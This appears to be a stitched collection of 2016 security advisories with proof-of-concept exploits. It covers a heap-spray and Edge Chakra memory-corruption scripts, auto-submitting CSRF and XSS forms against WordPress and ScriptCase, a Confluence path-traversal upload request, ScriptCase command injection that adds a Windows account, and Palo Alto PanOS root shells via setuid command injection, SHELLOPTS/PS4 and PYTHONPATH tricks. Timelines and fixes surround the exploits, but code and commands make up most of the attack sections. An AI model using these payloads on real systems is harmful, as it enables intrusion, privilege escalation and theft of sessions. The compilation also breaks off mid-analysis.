-0x8000, // | | -7000 | 8000 24000 14000 (5.3Gb)
];
var aoHeap = [],
oToBeFreed;
aiAllocationSizes.forEach(function (iAllocationSize) {
if (iAllocationSize < 0 && oToBeFreed) {
console.log("-0x" + oToBeFreed.byteLength.toString(16));
oToBeFreed = null; // Free the heap block that was queued to be freed.
CollectGarbage();
}
var uAllocationSize = Math.abs(iAllocationSize) * 0x10000 - 1;
console.log("+0x" + uAllocationSize.toString(16));
var oArrayBuffer = new ArrayBuffer(uAllocationSize);
if (iAllocationSize < 0) {
oToBeFreed = oArrayBuffer; // Schedule this to be freed
} else {
//aoHeap.push(oArrayBuffer);
}
});
</script>

B
</body>
<!--
Time-line
June 2016: This vulnerability was found through fuzzing.
June 2016: This vulnerability was submitted to ZDI and iDefense.
July 2016: This vulnerability was acquired by ZDI.
September 2016: This vulnerability was addressed by Microsoft in MS16-104.
November 2016: Details of this issue are released.
-->
<!--
Source: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_instagram_feed_plugin_via_csrf.html
Persistent Cross-Site Scripting in Instagram Feed plugin via CSRF
Abstract
A persistent Cross-Site Scripting vulnerability was found in the Instagram Feed plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a URL provided by an attacker.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160724-0014
Tested versions
This issue was successfully tested on the Instagram Feed WordPress Plugin version 1.4.6.2.
Fix
This issue is resolved in Instagram Feed WordPress Plugin version 1.4.7.
Introduction
Instagram Feed is a WordPress plugin to display beautifully clean, customizable, and responsive feeds from multiple Instagram accounts. A persistent Cross-Site Scripting vulnerability was found in the Instagram Feed plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a URL provided by an attacker.
Details
The settings page of the Instagram Feed plugin does not perform CSRF checks. It's possible to change all settings in the plugin by making an authenticated administrator perform a request to change the settings (CSRF). It's possible to change the Instagram access token and id to show images of other users. It's also possible to inject malicious JavaScript in the Customize section, to perform Persistent Cross-Site Scripting. Any user visiting the Instagram Feed will be injected with the attackers payload after the CSRF attack.
Proof of Concept
Have an authenticated admin visit a webpage with the following form:
-->
<html>
<body>
<form action="http://<wordpress site>/wp-admin/admin.php?page=sb-instagram-feed&tab=customize" method="POST">
<input type="hidden" name="sb_instagram_settings_hidden_field" value="Y" />
<input type="hidden" name="sb_instagram_customize_hidden_field" value="Y" />
<input type="hidden" name="sb_instagram_width" value="100" />
<input type="hidden" name="sb_instagram_width_unit" value="%" />
<input type="hidden" name="sb_instagram_height" value="100" />
<input type="hidden" name="sb_instagram_height_unit" value="%" />
<input type="hidden" name="sb_instagram_background" value="#474747" />
<input type="hidden" name="sb_instagram_sort" value="none" />
<input type="hidden" name="sb_instagram_num" value="20" />
<input type="hidden" name="sb_instagram_cols" value="4" />
<input type="hidden" name="sb_instagram_image_res" value="auto" />
<input type="hidden" name="sb_instagram_image_padding" value="5" />
<input type="hidden" name="sb_instagram_image_padding_unit" value="px" />
<input type="hidden" name="sb_instagram_show_header" value="on" />
<input type="hidden" name="sb_instagram_header_color" value="" />
<input type="hidden" name="sb_instagram_show_btn" value="on" />
<input type="hidden" name="sb_instagram_btn_background" value="" />
<input type="hidden" name="sb_instagram_btn_text_color" value="" />
<input type="hidden" name="sb_instagram_btn_text" value="Load More..." />
<input type="hidden" name="sb_instagram_show_follow_btn" value="on" />
<input type="hidden" name="sb_instagram_folow_btn_background" value="" />
<input type="hidden" name="sb_instagram_follow_btn_text_color" value="" />
<input type="hidden" name="sb_instagram_follow_btn_text" value="Follow on Instagram" />
<input type="hidden" name="sb_instagram_exclude_words" value="" />
<input type="hidden" name="sb_instagram_include_words" value="" />
<input type="hidden" name="sb_instagram_hide_photos" value="" />
<input type="hidden" name="sb_instagram_block_users" value="" />
<input type="hidden" name="sb_instagram_custom_css" value="" />
<input type="hidden" name="sb_instagram_custom_js" value="} });</script><script>alert(1);</script> " />
<input type="hidden" name="submit" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<!-- The Custom JavaScript section will now be saved with the attacker's JavaScript payload. -->
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: AppFusions Doxygen for Atlassian Confluence
Vendor URL: www.appfusions.com
Type: Path Traversal [CWE-22]
Date found: 2016-06-23
Date published: -
CVSSv3 Score: 6.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)
CVE: -
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
AppFusions Doxygen for Atlassian Confluence v1.3.0
older versions may be affected too.
4. INTRODUCTION
===============
With Doxygen in Confluence, you can embed full-structure code documentation:
-Doxygen blueprint in Confluence to allow Doxygen archive imports
-Display documentation from annotated sources such as Java (i.e., JavaDoc),
C++, Objective-C, C#, C, PHP, Python, IDL (Corba, Microsoft, and
UNO/OpenOffice
flavors), Fortran, VHDL, Tcl, D in Confluence.
-Navigation supports code structure (classes, hierarchies, files), element
dependencies, inheritance and collaboration diagrams.
-Search documentation from within Confluence
-Restrict access to who can see/add what
-Doxygen in JIRA also available
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
The application offers the functionality to import zipped Doxygen
documentations via a file upload to make them available within a
Confluence page. However the application does not properly validate the
"tempId" parameter, which represents the directory where the contents of
the uploaded file will be extracted and stored to. This leads to a path
traversal vulnerability when "/../" sequences are used as part of the
"tempId" parameter. Since the contents of the uploaded file are
extracted to the traversed directory, this vulnerability could also lead
to Remote Code Execution.
In DoxygenUploadServlet.java (lines 63-64) the "tempId" parameter is
read as part of a GET request to "/plugins/servlet/doxygen/upload" and
afterwards used in a "getTemporaryDirectory()" call:
String tempId = request.getParameter("tempId");
String destination =
this.doxygenManager.getTemporaryDirectory(tempId).getAbsolutePath();
The "getTemporaryDirectory()" function is defined in
DefaultDoxyGenManager.java (lines 38-41) and constructs a file object
based on the "java.io.tmpdir" variable, the static string
"/doxygen-temp/", the user-supplied "tempId" and a file separator in
between all parts:
public File getTemporaryDirectory(String tempId) {
File file = new File(System.getProperty("java.io.tmpdir") +
File.separator + "doxygen-temp" + File.separator + tempId);
return file;
}
In the subsequent code the uploaded file as represented by the "file"
HTTP POST parameter to "/plugins/servlet/doxygen/upload" is extracted to
the directory which was built using the "file" object.
The following Proof-of-Concept triggers this vulnerability by uploading
a zipped file, which will be extracted to "/home/confluence" by the
application:
POST
/plugins/servlet/doxygen/upload?tempId=/../../../../../../home/confluence
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101
Firefox/46.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 966
Content-Type: multipart/form-data;
boundary=---------------------------62841490314755966452122422550
Cookie: doc-sidebar=300px; doxygen_width=256;
JSESSIONID=75A487B49F38A536358C728B1BE5A9E1
Connection: close
-----------------------------62841490314755966452122422550
Content-Disposition: form-data; name="file"; filename="Traversal.zip"
Content-Type: application/zip
[zipped data]
-----------------------------98001232218371736091795669059--
6. RISK
=======
To successfully exploit this vulnerability the attacker must be
authenticated and must have the rights within Atlassian Confluence to
upload Doxygen files (default).
The vulnerability allows remote attackers to upload arbitrary files to
any destination directory writeable by the user of the web server, which
could lead to Remote Code Execution.
7. SOLUTION
===========
Update to AppFusions Doxygen for Atlassian Confluence v1.3.4
8. REPORT TIMELINE (DD/MM/YYYY)
===============================
23/06/2016: Discovery of the vulnerability
23/06/2016: Notified vendor via public security mail address
29/06/2016: No response, sent out another notification w/o details
29/06/2016: Response from vendor who asked for full details
30/06/2016: Sent over preliminary advisory with full details
03/07/2016: No response from vendor, sent out a status request
03/07/2016: Vendor temporarily removes product from website
11/07/2016: Vendor releases v1.3.1 which fixes the issue
20/11/2016: Advisory released
<!--
Source: http://www.security-assessment.com/files/documents/advisory/edge_chakra_mem_corruption.pdf
Name: Microsoft Edge Scripting Engine Memory Corruption Vulnerability (MS16-129)
CVE: CVE-2016-7202
Vendor Website: http://www.microsoft.com/
Date Released: 09/11/2016
Affected Software: Microsoft Windows 10, Microsoft Windows Server 2016
Researchers: Scott Bell
Description
A memory corruption vulnerability was identified in the Microsoft Edge Chakra JavaScript engine which could
allow a malicious user to remotely execute arbitrary code on a vulnerable user’s machine, in the context of the
current user.
Exploitation
Exploitation of this vulnerability requires a user to visit a page containing specially crafted JavaScript. Users can
generally be lured to visit web pages via email, instant message or links on the internet. Vulnerabilities like this
are often hosted on legitimate websites which have been compromised by other means.
The following table shows some cursory debug information:
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00040001 ebx=01b1e760 ecx=00000012 edx=00000006 esi=00000000 edi=03f60000
eip=6a714bea esp=0328fa80 ebp=0328fab0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
jscript9!Recycler::ScanObject+0x23:
6a714bea 8b37 mov esi,dword ptr [edi] ds:0023:03f60000=????????
2:046> k
ChildEBP RetAddr
0328fab0 6a589768 jscript9!Recycler::ScanObject+0x23
0328facc 6a58973a jscript9!Recycler::TryMarkBigBlockList+0x22
0328faf0 6a589d83 jscript9!Recycler::ScanArena+0x7a
0328fb24 6a585f4c jscript9!Recycler::BackgroundFindRoots+0x8e
0328fb34 6a561263 jscript9!Recycler::DoBackgroundWork+0x103
0328fb60 6a6b162c jscript9!Recycler::ThreadProc+0xd1
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Windows\system32\msvcrt.dll -
0328fb98 775c1287 jscript9!Recycler::StaticThreadProc+0x1c
WARNING: Stack unwind information not available. Following frames may be wrong.
0328fbd0 775c1328 msvcrt!itow_s+0x4c
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Windows\system32\kernel32.dll -
0328fbd8 7793ef1c msvcrt!endthreadex+0x6c
0328fbe4 777e3648 kernel32!BaseThreadInitThunk+0x12
0328fc24 777e361b ntdll!__RtlUserThreadStart+0x70
0328fc3c 00000000 ntdll!_RtlUserThreadStart+0x1b
The following proof of concept code can be used to reproduce the vulnerability:
-->
<html>
<META http-equiv="Expires" content="Tue, 20 Aug 1996 14:25:27 GMT">
<META http-equiv="Content-Type" content="text/html; charset=ISO-8859-5">
<body>
<script>try{
for(var z in "a") a1.set(a1, '' );
Array.prototype.sort.call(a1, 'a', a1)
a1 = this;
a2 = [];
a1 = a2.concat(a1.a1);
var a1 = new Iterator(a1);
a1.add(a1);
for (let zzz = 0; zzz < 117; ++zzz) {a1.unshift(a2, a1);}
a1.reverse();
Array.prototype.reverse.call(a1);
a1.splice(1, 10);
}catch(e){};</script>
</body>
</html>
<!--
Solution
M
icrosoft validated this security issue and issued a patch (MS16-129) to remedy it.
Security-Assessment.com recommends applying the patch which has been made available via Windows Update.
About Security-Assessment.com
Security-Assessment.com is a leading team of Information Security consultants specialising in providing high
quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of
the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and
government. Our aim is to provide the very best independent advice and a high level of technical expertise while
creating long and lasting professional relationships with our clients.
Security-Assessment.com is committed to security research and development, and its team continues to identify
and responsibly publish vulnerabilities in public and private software vendor's products. Members of the
Security-Assessment.com R&D team are globally recognised through their release of whitepapers and
presentations related to new security research.
For further information on this issue or any of our service offerings, contact us:
Web www.security-assessment.com
Email info@security-assessment.com
-->
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SCRIPTCASE-PHP-WEB-TOOL-MULTIPLE-VULNERABILITIES.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.scriptcase.net
Product:
===================
ScriptCase
v8.1.053, v8.1.051, v8.1.43.0
scriptcase_install_en_us_v8.1.053.exe
hash: ceaba1fce05556b82ab37582a7c907f4
scriptcase_install_en_us_v8.1.051.exe
hash: c3c9fbe085ab5462304c0c73c8698946
ScriptCase RAD is a development platform for PHP applications, is web
oriented and can be installed in a server in the internet.
Vulnerability Type:
=============================
CSRF Remote Command Execution
CSRF Add Admin
SQL Injection
Cross Site Scripting
Local Privlege Escalation (Insecure File Permissions)
User Enumeration / Token Bypass
Downloaded latest version v8.1.053, and still vulnerable.
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
[CSRF Remote Command Execution]
Scriptcase has a remote command execution ailment via CSRF, if an
authenticated user clicks an attacker link etc. This can allow attackers
to run arbitrary system commands on the affected host and do things like
add accounts etc.
Scriptcase PHP code uses encryption / obfuscated so its not easy testing
but we can see here the error returned for PHP eval()'d code
when injecting an Array [] brackets or something as paremeter.
Parse error: syntax error, unexpected end of file, expecting ']' in C:\Program Files (x86)\NetMake\v81\wwwroot\scriptcase\devel\lib\php\functions2.inc.php(358) : eval()'d code on line 1
After trying to wrap a Windows system call in backtick "`" operators it
worked perfectly. This allowed me to add an arbitrary system
account to the affected system.
[CSRF]
There are several cross site request forgery vectors, allowing attackers to
add an Admin account to Scriptcase application etc.
[Cross Site Scripting]
Multiple XSS entry points exists within the vulnerable application both GET
and POST.
Example XSS vulnerable scriptcase code 'ajax_cod_apls' is not santized
before being processed by ajax HTTP post request.
$.ajax({
type: 'POST',
url: '/scriptcase/devel/iface/generate.php',
data:
'compile_app_ajax=S&gen_option=console&targ_frame=_self&console=yes&ajax_cod_apls='
+ str_open_apps,
success: function(s_result){
a_result = s_result.split('__compile_ajax_sep_row__');
nm_compile_gerar();
}
});
[Local Privilege Escalation]
scriptcase uses weak insecure file permissions as the “Everyone” group has
full access on it. Allowing low privileged users to
execute arbitrary code in the security context of ANY other users with
elevated privileges on the affected system.
"Everyone" encompasses all users who have logged in with a password as well
as built-in, non-password protected accounts such as Guest
and LOCAL_SERVICE.Any user (even guest) will be able to replace, modify or
change the file. This would allow an attacker the ability
to inject code or replace scriptcase used executables and have it run in
the context of the system.
[User Enumeration]
On failed scriptcase login the application returns one of the following in
the HTTP response.
"The login name provided is not registered on the system."
On a failed password but correct user name entered application HTTP
response returns.
"The password is incorrect."
Exploit code(s):
===============
[CSRF Remote Command Execution]
Note: we NEED to use backtick operators "`"
http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=`start net user EVIL abc123 /add`
Verify...
c:\> net user
User accounts for \\hyp3rlinx
------------------------------------------------------------------------
Administrator hyp3rlinx Guest
EVIL Test Privileged-User
2) start Windows 'calc.exe'
http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=`calc.exe`
OR
http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=`start
calc.exe`
**sometimes "calc.exe" doesnt appear but it is running use "tasklist /v |
findstr calc.exe" to verify it is in fact running.
4) Apache DOS (needs httpd environmental variable set)
http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=`taskkill /f /im httpd.exe`
[SQL Injection]
AND boolean-based blind - WHERE or HAVING clause in 'nrLinhas' parameter "10 AND 2=2"
<form action="http://127.0.0.1:8081/scriptcase/devel/iface/admin_user.php" method="post">
<input type="hidden" name="nOpc" value="1">
<input type="hidden" name="nOpr" value="0">
<input type="hidden" name="nColOrd" value="1">
<input type="hidden" name="nLogin" value="">
<input type="hidden" name="nFiltro" value="2">
<input type="hidden" name="filtroTipo" value="2">
<input type="hidden" name="filtroTexto" value="1">
<input type="hidden" name="nrLinhas" value="10 AND 2=2">
<input type="hidden" name="nrInicio" value="0">
<input type="hidden" name="maxReg" value="1">
<script>document.forms[0].submit()</script>
</form>
[CSRF Add Admin]
<form name="form_user" action=" http://127.0.0.1:8081/scriptcase/devel/iface/admin_user.php" method="POST">
<input type="hidden" name="nOpc" value="2">
<input type="hidden" name="nOpr" value="2">
<input type="hidden" name="nLogin" value="hyp3rlinx">
<input type="hidden" name="nMail" value="pwn@Done.com">
<input type="hidden" name="nPass[]" value="abc123">
<input type="text" name="nPass[]" value="abc123"/>
<input type="text" name="privBox%5B%5D" value="Priv_Admin" />
<input type="hidden" name="privBox%5B%5D" value="Priv_Proj" />
<input type="hidden" name="privBox%5B%5D" value="Priv_DataDictionary" />
<input type="hidden" name="privBox%5B%5D" value="Priv_Exec">
<input type="hidden" name="privBox%5B%5D" value="Priv_Export">
<input type="hidden" name="privBox%5B%5D" value="Priv_Library">
<input type="hidden" name="privBox%5B%5D" value="Priv_Reports">
<input type="hidden" name="privBox%5B%5D" value="Priv_Locales">
<input type="hidden" name="privBox%5B%5D" value="Priv_Publish">
<input type="hidden" name="privBox%5B%5D" value="Priv_Aba">
<input type="hidden" name="privBox%5B%5D" value="Priv_Blank">
<input type="hidden" name="privBox%5B%5D" value="Priv_Calendar">
<input type="hidden" name="privBox%5B%5D" value="Priv_Chart">
<input type="hidden" name="privBox%5B%5D" value="Priv_Cons">
<input type="hidden" name="privBox%5B%5D" value="Priv_Container">
<input type="hidden" name="privBox%5B%5D" value="Priv_Ctrl">
<input type="hidden" name="privBox%5B%5D" value="Priv_Filt">
<input type="hidden" name="privBox%5B%5D" value="Priv_Edit">
<input type="hidden" name="privBox%5B%5D" value="Priv_Menu">
<input type="hidden" name="privBox%5B%5D" value="Priv_ReportPdf">
<input type="hidden" name="privBox%5B%5D" value="Priv_DbManager">
<input type="hidden" name="privBox%5B%5D" value="Priv_DbConvert">
<input type="hidden" name="privBox%5B%5D" value="Priv_SQLBuilder">
<input type="hidden" name="privBox%5B%5D" value="Priv_Connection">
<input type="hidden" name="hidden" value="New User">
<script> document.forms[0].submit()</script>
</form>
[CSRF mysql connect creation wizard]
<form action="
http://127.0.0.1:8081/scriptcase/devel/iface/admin_sys_allconections_create_wizard.php" method="post">
<input type="hidden" name="ajax" value="S"/>
<input type="hidden" name="set_charset" value="S"/>
<input type="hidden" name="dbms" value="mysql"/>
<input type="hidden" name="sgdb" value="pdo_mysql"/>
<input type="hidden" name="exit" value="S"/>
<input type="hidden" name="host" value="127__DOT__0__DOT__0__DOT__1:3306"/>
<input type="hidden" name="usr" value="root"/>
<input type="hidden" name="pwd" value=""/>
<input type="hidden" name="db" value="mysql"/>
<script>document.forms[0].submit()</script>
</form>
[Cross Site Scripting] - Successful in Firefox
XSS 1)
http://127.0.0.1:8081/scriptcase/devel/iface/app_import.php?option=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS 2)
http://127.0.0.1:8081/scriptcase/devel/iface/popup_sql_script.php?sql_script=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS 3)
<form action="http://127.0.0.1:8081/scriptcase/devel/iface/generate.php"
method="post">
<input type="hidden" name="compile_app_ajax" value="S"/>
<input type="hidden" name="gen_option" value="console"/>
<input type="hidden" name="targ_frame" value="_self"/>
<input type="hidden" name="console" value="yes"/>
<input type="hidden" name="ajax_cod_apls"
value="<script>alert(document.cookie)</script>"/>
<script>document.forms[0].submit()</script>
</form>
XSS 4)
<form action="http://127.0.0.1:8081/scriptcase/devel/iface/admin_user.php"
method="post">
<input type="hidden" name="nOpc" value="1">
<input type="hidden" name="nOpr" value="0">
<input type="hidden" name="nColOrd" value="1">
<input type="hidden" name="nLogin" value="">
<input type="hidden" name="nFiltro" value="2">
<input type="hidden" name="filtroTipo" value="2">
<input type="hidden" name="filtroTexto"
value='"/><script>alert(document.cookie)</script>'>
<input type="hidden" name="nrLinhas" value="10">
<input type="hidden" name="nrInicio" value="0">
<input type="hidden" name="maxReg" value="1">
<script>document.forms[0].submit()</script>
</form>
[Local Privilege Escalations]
Proof.
C:\Program Files (x86)\NetMake\v81\components>cacls * | findstr Everyone |
more
C:\Program Files (x86)\NetMake\v81\components\apache Everyone:(ID)F
Everyone:(OI)(CI)(IO)(ID)
C:\Program Files (x86)\NetMake\v81\components\msodbcsql_x64.msi
Everyone:(ID)F
C:\Program Files (x86)\NetMake\v81\components\msodbcsql_x86.msi
Everyone:(ID)F
C:\Program Files (x86)\NetMake\v81\components\php Everyone:(ID)F
Everyone:(OI)(CI)(IO)(ID)F
C:\Program Files (x86)\NetMake\v81\wwwroot>cacls * | findstr Everyone | more
C:\Program Files (x86)\NetMake\v81\wwwroot\favicon.ico Everyone:(ID)F
C:\Program Files (x86)\NetMake\v81\wwwroot\index.php Everyone:(ID)F
C:\Program Files (x86)\NetMake\v81\wwwroot\robots.txt Everyone:(ID)F
C:\Program Files (x86)\NetMake\v81\wwwroot\scriptcase Everyone:(ID)F
Everyone:(OI)(CI)(IO)(ID)F
[User Account Enumeration / Token Bypass]
First off the stupid token used on the login FORM e.g. "form_login=<TOKEN>"
is totally useless you can put anything you like in it
and the application will happily process the request.
CURL Enumeration 1)
curl -i -v -X POST
http://127.0.0.1:8081/scriptcase/devel/iface/login.php?rand= -d
field_user=BOZO -d field_pass=1 -d ajax=nm -d option=login -d
form_login=STUPID-TOKEN -d language=en_US
HTTP Response:
"error1:The login name provided is not registered on the system."
CURL Enumeration 2)
curl -i -v -X POST
http://127.0.0.1:8081/scriptcase/devel/iface/login.php?rand= -d
field_user=admin -d field_pass=1 -d ajax=nm -d option=login -d
form_login=STUPID-TOKEN -d language=en_US
HTTP Response:
"error1:The password is incorrect."
Either way we know when we hit a valid account.
Disclosure Timeline:
=========================================
Vendor Notification: October 13, 2016
Vendor acknowledgement: October 14, 2016
Vendor request POC video: October 14, 2016
Sent vendor video link: October 14, 2016
Request update from vendor: October 17, 2016
Vendor reply: "under review"
Vendor requests video again: October 25, 2016
Request update from vendor: October 30, 2016
Vendor reply: "No information"
Request ETA: November 7, 2016
Request status: November 14, 2016
Vendor Unresponsive No More Replies
November 20, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote / Local
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=908
Palo Alto Networks have published a fix for this issue: http://securityadvisories.paloaltonetworks.com/Home/Detail/68
PanOS uses a modified version of the appweb3 embedded webserver, it's used for
a variety of tasks and is enabled by default. I've noticed a bug in the core utility routine mprItoa:
char *mprItoa(char *buf, int size, int64 value, int radix);
https://embedthis.com/appweb/doc-3/ejs/api/mpr.html#mpr_8h_1c44ccf179c55dbbcf7aa04ba86090463
The size parameter is documented to be the size of the buffer at *buf, but if
the value exceeds that it will write one more byte than that as a nul
terminator.
Note that appweb3 has been EOL since 2012 and no longer receives security
updates and is not supported by the developer, so security maintenance is the
responsibility of Palo Alto Networks. It seems crazy to ship a EOL web server,
but whatever.
I've found an unauthenticated php script that an attacker call force to invoke
mprItoa() on a default installation at /unauth/php/errorPage.php, it can be
called like so:
/unauth/php/errorPage.php?code=1e16
This example should corrupt the stored GOT pointer, resulting in some
unexpected routine being called on the attacker-controlled MaResponse object,
and crashing with some heap corruption.
*** glibc detected *** /usr/local/bin/appweb3: double free or corruption (out): 0x08229e98 ***
======= Backtrace: =========
/lib/libc.so.6[0xf7ee8786]
/lib/libc.so.6(cfree+0x59)[0xf7ee8bb9]
/usr/local/bin/../lib/3p/libappweb3.so.1(maFillHeaders+0x128)[0xf7e64c58]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e6793b]
/usr/local/bin/../lib/3p/libappweb3.so.1(maServiceQueue+0x28)[0xf7e608f8]
/usr/local/bin/../lib/3p/libappweb3.so.1(maServiceQueues+0x38)[0xf7e5f438]
/usr/local/bin/../lib/3p/libappweb3.so.1(maRunPipeline+0x37)[0xf7e5f497]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e6346d]
/usr/local/bin/../lib/3p/libappweb3.so.1(maProcessReadEvent+0x27f)[0xf7e63e0f]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e5ad74]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e36afd]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e3607c]
/usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e30c6f]
/usr/local/bin/../lib/3p/libappweb3.so.1(threadProcWrapper+0x36)[0xf7e31296]
/lib/libpthread.so.0[0xf6e9b6e1]
/lib/libc.so.6(clone+0x5e)[0xf7f52aee]
======= Memory map: ========
08048000-0804c000 rwxp 00000000 08:02 67709 /usr/local/bin/appweb3
0804c000-095e5000 rwxp 00000000 00:00 0 [heap]
f1c00000-f1cd0000 rwxp 00000000 00:00 0
etc.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=913
This was fixed by PAN: http://securityadvisories.paloaltonetworks.com/Home/Detail/67
The root_reboot utility is setuid root, but performs multiple calls to system() with attacker controlled data, such as this one:
.text:0804870F C7 44 24 04 78+ mov dword ptr [esp+4], offset aUsrLocalBinPan ; "/usr/local/bin/pan_elog -i 1 -e 3 -s 4 "...
.text:08048717 89 04 24 mov [esp], eax ; char **
.text:0804871A E8 0D FE FF FF call _asprintf
.text:0804871F 8B 45 E8 mov eax, [ebp+new]
.text:08048722 85 C0 test eax, eax
.text:08048724 0F 84 B9 01 00+ jz loc_80488E3
.text:0804872A 89 04 24 mov [esp], eax ; command
.text:0804872D E8 9A FD FF FF call _system
Which is trying to do this:
if (setuid(0) < 0)
{
fprintf(stderr, "%s: Can't setuid to reboot system\n");
}
if (reason) {
asprintf(&new, "/usr/local/bin/pan_elog -i 1 -e 3 -s 4 -m \"The system is shutting down due to %s.\"", reason);
system(new);
free(new);
}
This is trivially exploitable, for example:
$ ls -l /usr/local/bin/root_reboot
-rwsr-xr-x 1 root root 16275 Oct 17 2014 /usr/local/bin/root_reboot
$ root_reboot --restart '"; bash -i; echo "'
# id
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)
Palo Alto pointed out that they had already fixed this bug in an update that I needed to apply:
https://securityadvisories.paloaltonetworks.com/Home/Detail/45
However, looking at the fix they had essentially just checked that each character in the "reason" parameter was alphanumeric or white space. This does not prevent exploitation, you can just do this:
$ env SHELLOPTS=xtrace PS4='$(id)' root_reboot --restart whatever
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=912
The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script:
$ ls -l /usr/local/bin/root_trace
-rwsr-xr-x 1 root root 12376 Oct 17 2014 /usr/local/bin/root_trace
As the environment is not scrubbed, you can just do something like this:
$ cat /tmp/sysd.py
import os
os.system("id")
os._exit(0);
$ PYTHONPATH=/tmp root_trace
uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)
This was fixed by PAN:
http://securityadvisories.paloaltonetworks.com/Home/Detail/67
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=934
There is a heap overflow in Array.splice in Chakra.
When an array is spliced, and overflow check is performed, but ArraySpeciesCreate, which can execute code and alter the array is called after this. This can allow an Array with boundaries that cause integer overflows to be spliced, leading to heap overflows in several situations.
A minimal PoC is as follows and a full PoC is attached.
var a = [];
class dummy{}
a.length = 200000;
a.fill(7, 10000, 10200);
var o = {};
Object.defineProperty(o, 'constructor', {
get: function() {
a.length = 0xfffffffe;
var k = [];
k.fill.call(a, 7.7, 0xfffff000, 0xfffffffe);
return dummy;
}
});
a.__proto__ = o;
var q = [];
q.length = 500;
q.fill(7.7);
var j = [];
a.length = 0xfffffffe - 500;
j.splice.call(a, 0, ...q);
a[0xfffff1ec - 1] = 10;
This PoC is a bit unreliable, it may need to be refreshed a few times to crash.
-->
<html>
<head>
<meta http-equiv="refresh" content="1">
</head>
<body>
<script>
var a = [];
class dummy{}
a.length = 200000;
a.fill(7, 10000, 10200);
var o = {};
Object.defineProperty(o, 'constructor', {
get: function() {
a.length = 0xfffffffe;
var k = [];
k.fill.call(a, 7.7, 0xfffff000, 0xfffffffe);
return dummy;
}
});
a.__proto__ = o;
var q = [];
q.length = 500;
q.fill(7.7);
var j = [];
a.length = 0xfffffffe - 500;
j.splice.call(a, 0, ...q);
a[0xfffff1ec - 1] = 10;
</script>
</body>
</html>
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=925
There is an overflow when reversing arrays in Chakra.
On line 5112 of JavascriptArray::EntryReverse, the length of the array is fetched and stored. It is then passed as a parameter into JavascriptArray::ReverseHelper, which then calls FillFromPrototypes, which can change the size of the array. If the size of the array is set to be larger than it was when the length was fetched, the calculation of the array segment head left value on line 5219:
seg->left = ((uint32)length) - (seg->left + seg->length);
Can become a very large value (as length is larger than seg->length and seg->left is generally 0). This can cause the segment length to become larger than the segment size the next time SparseArraySegmentBase::EnsureSizeInBound is called, as the method contains the following code:
uint32 nextLeft = next ? next->left : JavascriptArray::MaxArrayLength;
Assert(nextLeft > left);
if(size != 0)
{
size = min(size, nextLeft - left);
}
